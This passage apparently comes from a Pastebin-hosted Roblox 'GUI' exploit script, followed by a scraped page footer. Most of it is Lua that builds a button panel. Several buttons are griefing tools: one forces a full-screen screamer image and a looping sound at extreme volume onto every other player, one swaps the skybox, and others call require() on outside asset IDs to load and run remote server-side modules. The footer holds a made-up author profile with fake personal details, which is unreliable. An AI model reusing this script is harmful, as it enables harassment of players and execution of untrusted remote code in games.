  678. coroutine.wrap(JQMPQN_fake_script)()

  679. local function GANYBB_fake_script() -- stopmusic.Script

  680. local script = Instance.new('Script', stopmusic)

  681. function onClick()

  682. Instance.new("Sound").Parent = game.Workspace game.Workspace.Sound.SoundId ="rbxassetid://0" game.Workspace.Sound.Looped=true game.Workspace.Sound:Play()

  683. end

  684. script.Parent.MouseButton1Down:connect(onClick)

  685. end

  686. coroutine.wrap(GANYBB_fake_script)()

  687. local function HJRZ_fake_script() -- destroy.jump

  688. local script = Instance.new('Script', destroy)

  689. script.Parent.MouseButton1Click:Connect(function()

  690. for i,v in pairs(game.Players:GetPlayers()) do

  691. if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then

  692. spawn(function()

  693. local newgui = Instance.new("ScreenGui",v.PlayerGui)

  694. newgui.Name = "Screamer"

  695. local newimage = Instance.new("ImageLabel",newgui)

  696. newimage.Image = "http://www.roblox.com/asset/?id=7676654418"

  697. newimage.Size = UDim2.new(1,1,1,1)

  698. local s = Instance.new("Sound",newgui)

  699. s.SoundId = "rbxassetid://9069609200"

  700. s.Volume = 9999999999999999999999999999999999999

  701. s.Looped = true

  702. s:Play()

  703. print("Screamed "..v.Name)

  704. while wait(9) do

  705. newimage.Parent:Destroy()

  706. end

  707. end)

  708. end

  709. end

  710. end)

  711. end

  712. coroutine.wrap(HJRZ_fake_script)()

  713. local function KPJPVG_fake_script() -- destroy.Script

  714. local script = Instance.new('Script', destroy)

  715. script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)

  716. require(9617037720)():start()

  717. end)

  718. end

  719. coroutine.wrap(KPJPVG_fake_script)()

  720. local function EIVP_fake_script() -- destroy.LocalScript

  721. local script = Instance.new('LocalScript', destroy)

  722. script.Parent.MouseButton1Click:Connect(function()

  723. script.Parent.RemoteEvent:FireServer()

  724. end)

  725. end

  726. coroutine.wrap(EIVP_fake_script)()

  727. local function ZZMZNYG_fake_script() -- ss1.Script

  728. local script = Instance.new('Script', ss1)

  729. script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)

  730. require(8946786542).load(plr.name)

  731. end)

  732. end

  733. coroutine.wrap(ZZMZNYG_fake_script)()

  734. local function GXLWGVM_fake_script() -- ss1.LocalScript

  735. local script = Instance.new('LocalScript', ss1)

  736. script.Parent.MouseButton1Click:Connect(function()

  737. script.Parent.RemoteEvent:FireServer()

  738. end)

  739. end

  740. coroutine.wrap(GXLWGVM_fake_script)()

  741. local function KNRPXZ_fake_script() -- ss2.Script

  742. local script = Instance.new('Script', ss2)

  743. script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)

  744. require(9134953766).load(plr.name)

  745. end)

  746. end

  747. coroutine.wrap(KNRPXZ_fake_script)()

  748. local function JCTKSE_fake_script() -- ss2.LocalScript

  749. local script = Instance.new('LocalScript', ss2)

  750. script.Parent.MouseButton1Click:Connect(function()

  751. script.Parent.RemoteEvent:FireServer()

  752. end)

  753. end

  754. coroutine.wrap(JCTKSE_fake_script)()

  755. local function DDSB_fake_script() -- ss3.Script

  756. local script = Instance.new('Script', ss3)

  757. script.Parent.RemoteEvent.OnServerEvent:Connect(function(plr)

  758. require(9497518303).BYTEGUIKYXLES(plr.name)

  759. end)

  760. end

  761. coroutine.wrap(DDSB_fake_script)()

  762. local function HLOXYN_fake_script() -- ss3.LocalScript

  763. local script = Instance.new('LocalScript', ss3)

  764. script.Parent.MouseButton1Click:Connect(function()

  765. script.Parent.RemoteEvent:FireServer()

  766. end)

  767. end

  768. coroutine.wrap(HLOXYN_fake_script)()

  769. local function WTXPJT_fake_script() -- flag.Script

  770. local script = Instance.new('Script', flag)

  771. function click()

  772. s = Instance.new("Sky")

  773. s.Name = "Sky"

  774. s.Parent = game.Lighting

  775. s.SkyboxBk = "http://www.roblox.com/asset/?id=7676654418"

  776. s.SkyboxDn = "http://www.roblox.com/asset/?id=7676654418"

  777. s.SkyboxFt = "http://www.roblox.com/asset/?id=7676654418"

  778. s.SkyboxLf = "http://www.roblox.com/asset/?id=7676654418"

  779. s.SkyboxRt = "http://www.roblox.com/asset/?id=7676654418"

  780. s.SkyboxUp = "http://www.roblox.com/asset/?id=7676654418"

  781. game.Lighting.TimeOfDay = 12

  782. end

  783. script.Parent.MouseButton1Down:connect(click)

  784. end

  785. coroutine.wrap(WTXPJT_fake_script)()

  786. end)

  787. DayToNight.Name = "DayToNight"

  788. DayToNight.Parent = Frame

  789. DayToNight.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  790. DayToNight.Position = UDim2.new(0.388888896, 0, 0.216000006, 0)

  791. DayToNight.Size = UDim2.new(0, 83, 0, 31)

  792. DayToNight.Font = Enum.Font.GothamBold

  793. DayToNight.Text = "Night"

  794. DayToNight.TextColor3 = Color3.fromRGB(0, 0, 0)

  795. DayToNight.TextScaled = true

  796. DayToNight.TextSize = 14.000

  797. DayToNight.TextWrapped = true

  798. DayToNight.MouseButton1Down:connect(function()

  799. while true do

  800. print ("Loop cycle start")

  801. game.Lighting.TimeOfDay = "18:00:00"

  802. wait(0.5)

  803. end

  804. end)

  805. e666.Name = "e666"

  806. e666.Parent = Frame

  807. e666.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  808. e666.Position = UDim2.new(0.388888896, 0, 0.43599999, 0)

  809. e666.Size = UDim2.new(0, 83, 0, 31)

  810. e666.Font = Enum.Font.GothamBold

  811. e666.Text = "sit"

  812. e666.TextColor3 = Color3.fromRGB(0, 0, 0)

  813. e666.TextScaled = true

  814. e666.TextSize = 14.000

  815. e666.TextWrapped = true

  816. e666.MouseButton1Down:connect(function()

  817. game.Players.LocalPlayer.Character.Humanoid.Sit = true

  818. end)

  819. EpicSaxGuy.Name = "EpicSaxGuy"

  820. EpicSaxGuy.Parent = Frame

  821. EpicSaxGuy.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  822. EpicSaxGuy.Position = UDim2.new(0.388888896, 0, 0.648000002, 0)

  823. EpicSaxGuy.Size = UDim2.new(0, 83, 0, 34)

  824. EpicSaxGuy.Font = Enum.Font.GothamBold

  825. EpicSaxGuy.Text = "die"

  826. EpicSaxGuy.TextColor3 = Color3.fromRGB(0, 0, 0)

  827. EpicSaxGuy.TextScaled = true

  828. EpicSaxGuy.TextSize = 14.000

  829. EpicSaxGuy.TextWrapped = true

  830. EpicSaxGuy.MouseButton1Down:connect(function()

  831. game.Players.LocalPlayer.Character.Humanoid.Health = 0

  832. end)

  833. Disc0.Name = "Disc0"

  834. Disc0.Parent = Frame

  835. Disc0.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  836. Disc0.Position = UDim2.new(0.693121672, 0, 0.216000006, 0)

  837. Disc0.Size = UDim2.new(0, 89, 0, 31)

  838. Disc0.Font = Enum.Font.GothamBold

  839. Disc0.Text = "Disco no work"

  840. Disc0.TextColor3 = Color3.fromRGB(0, 0, 0)

  841. Disc0.TextScaled = true

  842. Disc0.TextSize = 14.000

  843. Disc0.TextWrapped = true

  844. Disc0.MouseButton1Down:connect(function()

  845. while true do

  846. game.Lighting.Ambient = Color3.new(math.random(), math.random(), math.random())

  847. wait(.25)

  848. end

  849. end)

  850. e2006Theme.Name = "e2006Theme"

  851. e2006Theme.Parent = Frame

  852. e2006Theme.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  853. e2006Theme.Position = UDim2.new(0.693121672, 0, 0.43599999, 0)

  854. e2006Theme.Size = UDim2.new(0, 89, 0, 31)

  855. e2006Theme.Font = Enum.Font.GothamBold

  856. e2006Theme.Text = "2006 Music no work"

  857. e2006Theme.TextColor3 = Color3.fromRGB(0, 0, 0)

  858. e2006Theme.TextScaled = true

  859. e2006Theme.TextSize = 14.000

  860. e2006Theme.TextWrapped = true

  861. e2006Theme.MouseButton1Down:connect(function()

  862. --Made by Servano

  863. local s = Instance.new("Sound")

  864. s.Name = "Sound"

  865. s.SoundId = "http://www.roblox.com/asset/?id=1987072964"

  866. s.Volume = 1

  867. s.Pitch = 1

  868. s.Looped = true

  869. s.archivable = false

  870. s.Parent = game.Workspace

  871. wait(1)

  872. s:play()

  873. end)

  874. ForceField.Name = "ForceField"

  875. ForceField.Parent = Frame

  876. ForceField.BackgroundColor3 = Color3.fromRGB(255, 0, 0)

  877. ForceField.Position = UDim2.new(0.693121672, 0, 0.648000002, 0)

  878. ForceField.Size = UDim2.new(0, 89, 0, 34)

  879. ForceField.Font = Enum.Font.GothamBold

  880. ForceField.Text = "FF"

  881. ForceField.TextColor3 = Color3.fromRGB(0, 0, 0)

  882. ForceField.TextScaled = true

  883. ForceField.TextSize = 14.000

  884. ForceField.TextWrapped = true

  885. ForceField.MouseButton1Down:connect(function()

  886. -- Gui to Lua

  887. -- Version: 3.

  888. -- Instances:

  889. local ForceFieldGUI = Instance.new("ScreenGui")

  890. local ForceFieldGUI_2 = Instance.new("TextButton")

  891. local ForceFieldOFF = Instance.new("TextButton")

  892. local ForceFieldON = Instance.new("TextButton")

  893. --Properties:

  894. ForceFieldGUI.Name = "ForceFieldGUI"

  895. ForceFieldGUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

  896. ForceFieldGUI_2.Name = "ForceFieldGUI"

  897. ForceFieldGUI_2.Parent = ForceFieldGUI

  898. ForceFieldGUI_2.BackgroundColor3 = Color3.fromRGB(0, 255, 255)

  899. ForceFieldGUI_2.BackgroundTransparency = 0.300

  900. ForceFieldGUI_2.BorderColor3 = Color3.fromRGB(245, 244, 247)

  901. ForceFieldGUI_2.BorderSizePixel = 0

  902. ForceFieldGUI_2.Position = UDim2.new(0, 0, 0, 240)

  903. ForceFieldGUI_2.Size = UDim2.new(0, 100, 0, 20)

  904. ForceFieldGUI_2.Text = "ForceField"

  905. ForceFieldGUI_2.TextColor3 = Color3.fromRGB(17, 17, 17)

  906. ForceFieldGUI_2.TextTransparency = 0.300

  907. ForceFieldOFF.Name = "ForceFieldOFF"

  908. ForceFieldOFF.Parent = ForceFieldGUI

  909. ForceFieldOFF.BackgroundColor3 = Color3.fromRGB(253, 253, 253)

  910. ForceFieldOFF.BackgroundTransparency = 0.300

  911. ForceFieldOFF.BorderColor3 = Color3.fromRGB(245, 244, 247)

  912. ForceFieldOFF.BorderSizePixel = 0

  913. ForceFieldOFF.Position = UDim2.new(0, 0, 0, 280)

  914. ForceFieldOFF.Size = UDim2.new(0, 100, 0, 20)

  915. ForceFieldOFF.Visible = false

  916. ForceFieldOFF.Text = "Off"

  917. ForceFieldOFF.TextColor3 = Color3.fromRGB(17, 17, 17)

  918. ForceFieldON.Name = "ForceFieldON"

  919. ForceFieldON.Parent = ForceFieldGUI

  920. ForceFieldON.BackgroundColor3 = Color3.fromRGB(253, 253, 253)

  921. ForceFieldON.BackgroundTransparency = 0.300

  922. ForceFieldON.BorderColor3 = Color3.fromRGB(245, 244, 247)

  923. ForceFieldON.BorderSizePixel = 0

  924. ForceFieldON.Position = UDim2.new(0, 0, 0, 260)

  925. ForceFieldON.Size = UDim2.new(0, 100, 0, 20)

  926. ForceFieldON.Visible = false

  927. ForceFieldON.Text = "On"

  928. ForceFieldON.TextColor3 = Color3.fromRGB(17, 17, 17)

  929. -- Scripts:

  930. local function DVAWVL_fake_script() -- ForceFieldGUI_2.Script

  931. local script = Instance.new('Script', ForceFieldGUI_2)

  932. function onClicked(GUI)

  933. h = script.Parent.Parent.Parent.Parent.Character:findFirstChild("Humanoid")

  934. if (h ~= nil) then

  935. script.Parent.Parent.ForceFieldOFF.Visible = true

  936. script.Parent.Parent.ForceFieldON.Visible = true

  937. else return end

  938. end

  939. script.Parent.MouseButton1Click:connect(onClicked)

  940. end

  941. coroutine.wrap(DVAWVL_fake_script)()

  942. local function HYECSMJ_fake_script() -- ForceFieldOFF.Script

  943. local script = Instance.new('Script', ForceFieldOFF)

  944. function onClicked(GUI)

  945. f = script.Parent.Parent.Parent.Parent.Character:findFirstChild("ForceField")

  946. if (f ~= nil) then

  947. f:remove()

  948. else return end

  949. end

  950. script.Parent.MouseButton1Click:connect(onClicked)

  951. end

  952. coroutine.wrap(HYECSMJ_fake_script)()

  953. local function LOYRXPU_fake_script() -- ForceFieldOFF.Script

  954. local script = Instance.new('Script', ForceFieldOFF)

  955. function onClicked(GUI)

  956. h = script.Parent.Parent.Parent.Parent.Character:findFirstChild("Humanoid")

  957. if (h ~= nil) then

  958. script.Parent.Parent.ForceFieldOFF.Visible = false

  959. script.Parent.Parent.ForceFieldON.Visible = false

  960. else return end

  961. end

  962. script.Parent.MouseButton1Click:connect(onClicked)

  963. end

  964. coroutine.wrap(LOYRXPU_fake_script)()

  965. local function PFEVNBW_fake_script() -- ForceFieldON.Script

  966. local script = Instance.new('Script', ForceFieldON)

  967. function onClicked(GUI)

  968. h = script.Parent.Parent.Parent.Parent.Character:findFirstChild("Humanoid")

  969. if (h ~= nil) then

  970. FF = Instance.new("ForceField")

  971. FF.Parent = script.Parent.Parent.Parent.Parent.Character

  972. else return end

  973. end

  974. script.Parent.MouseButton1Click:connect(onClicked)

  975. end

  976. coroutine.wrap(PFEVNBW_fake_script)()

  977. local function FNHQ_fake_script() -- ForceFieldON.Script

  978. local script = Instance.new('Script', ForceFieldON)

  979. function onClicked(GUI)

  980. h = script.Parent.Parent.Parent.Parent.Character:findFirstChild("Humanoid")

  981. if (h ~= nil) then

  982. script.Parent.Parent.ForceFieldOFF.Visible = false

  983. script.Parent.Parent.ForceFieldON.Visible = false

  984. else return end

  985. end

  986. script.Parent.MouseButton1Click:connect(onClicked)

  987. end

  988. coroutine.wrap(FNHQ_fake_script)()

  989. end)

  990. -- Scripts:

  991. local function QFCS_fake_script() -- Frame.Dragify

  992. local script = Instance.new('LocalScript', Frame)

  993. local UIS = game:GetService("UserInputService")

  994. function dragify(Frame)

  995. dragToggle = nil

  996. local dragSpeed = 0

  997. dragInput = nil

  998. dragStart = nil

  999. local dragPos = nil

  1000. function updateInput(input)

  1001. local Delta = input.Position - dragStart

  1002. local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)

  1003. game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()

  1004. end

  1005. Frame.InputBegan:Connect(function(input)

  1006. if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then

  1007. dragToggle = true

  1008. dragStart = input.Position

  1009. startPos = Frame.Position

  1010. input.Changed:Connect(function()

  1011. if input.UserInputState == Enum.UserInputState.End then

  1012. dragToggle = false

  1013. end

  1014. end)

  1015. end

  1016. end)

  1017. Frame.InputChanged:Connect(function(input)

  1018. if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then

  1019. dragInput = input

  1020. end

  1021. end)

  1022. game:GetService("UserInputService").InputChanged:Connect(function(input)

  1023. if input == dragInput and dragToggle then

  1024. updateInput(input)

  1025. end

  1026. end)

  1027. end

  1028. dragify(script.Parent)

  1029. end

  1030. coroutine.wrap(QFCS_fake_script)()

1x1x1x1 Gui Script modded by rey - Pastebin.com (2024)

References

Top Articles
Latest Posts
Article information

Author: Duane Harber

Last Updated:

Views: 5945

Rating: 4 / 5 (71 voted)

Reviews: 86% of readers found this page helpful

Author information

Name: Duane Harber

Birthday: 1999-10-17

Address: Apt. 404 9899 Magnolia Roads, Port Royceville, ID 78186

Phone: +186911129794335

Job: Human Hospitality Planner

Hobby: Listening to music, Orienteering, Knapping, Dance, Mountain biking, Fishing, Pottery

Introduction: My name is Duane Harber, I am a modern, clever, handsome, fair, agreeable, inexpensive, beautiful person who loves writing and wants to share my knowledge and understanding with you.